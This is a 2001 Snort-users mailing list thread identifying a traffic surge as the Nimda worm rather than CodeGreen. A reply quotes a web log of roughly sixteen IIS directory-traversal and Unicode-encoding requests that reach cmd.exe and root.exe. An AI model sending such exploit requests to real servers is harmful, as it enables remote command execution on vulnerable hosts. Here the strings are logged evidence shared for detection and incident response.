Snort mailing list archives
RE: Not CodeGreen
From: "Ginnetty, James" <JGinnetty () skandia com>
Date: Tue, 18 Sep 2001 16:22:54 -0400
Definitely not our friend code red. Our log files are showing just how pervasive this thing is. Looks like it will try 16 different exploit strings in an attempt to infect another server before moving on to the next IP. Here is a sorted cut from one of the logs. It is repeated many times over from different IP's. No wonder the level of traffic.... Jim 14:00:43 198.146.11.167 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 14:00:43 198.146.11.167 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 14:00:43 198.146.11.167 GET /c/winnt/system32/cmd.exe?/c+dir 14:00:43 198.146.11.167 GET /d/winnt/system32/cmd.exe?/c+dir 14:00:43 198.146.11.167 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy stem32/cmd.exe?/c+dir 14:00:43 198.146.11.167 GET /MSADC/root.exe?/c+dir 14:00:44 198.146.11.167 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir 14:00:44 198.146.11.167 GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 14:00:44 198.146.11.167 GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir 14:00:44 198.146.11.167 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir 14:00:43 198.146.11.167 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 14:00:44 198.146.11.167 GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir 14:00:44 198.146.11.167 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 14:00:43 198.146.11.167 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 14:00:44 198.146.11.167 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 14:00:43 198.146.11.167 GET /scripts/root.exe?/c+dir -----Original Message----- From: bthaler () webstream net [mailto:bthaler () webstream net] Sent: Tuesday, September 18, 2001 3:43 PM To: snort-users () lists sourceforge net Subject: [Snort-users] Not CodeGreen For everyone's information: The inordinate amount of traffic you're most likely seeing today is almost surely NOT CodeGreen. CodeGreed was developed as a way to patch server infected with CodeRed. What you are most likely seeing is in fact "nimda" which by all accounts seems like the last 3 or 4 big IIS exploits (CodeRed, Unicode, et all) rolled up into one big exploit. Again, this is most likely NOT CodeGreen, even though some have referred to it as that. BTW, my Snort-1.7MySQL database has surpassed 1,000,000 records just today, and is still going strong. Hows that for scaleability, baby? I run Snort-Win32 on one NT SMP machine, and the database from another machine, so the load gets balanced. Hats off to Martin R, et all. Regards, Brad T. _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Not CodeGreen bthaler (Sep 18)
- <Possible follow-ups>
- RE: Not CodeGreen Ginnetty, James (Sep 18)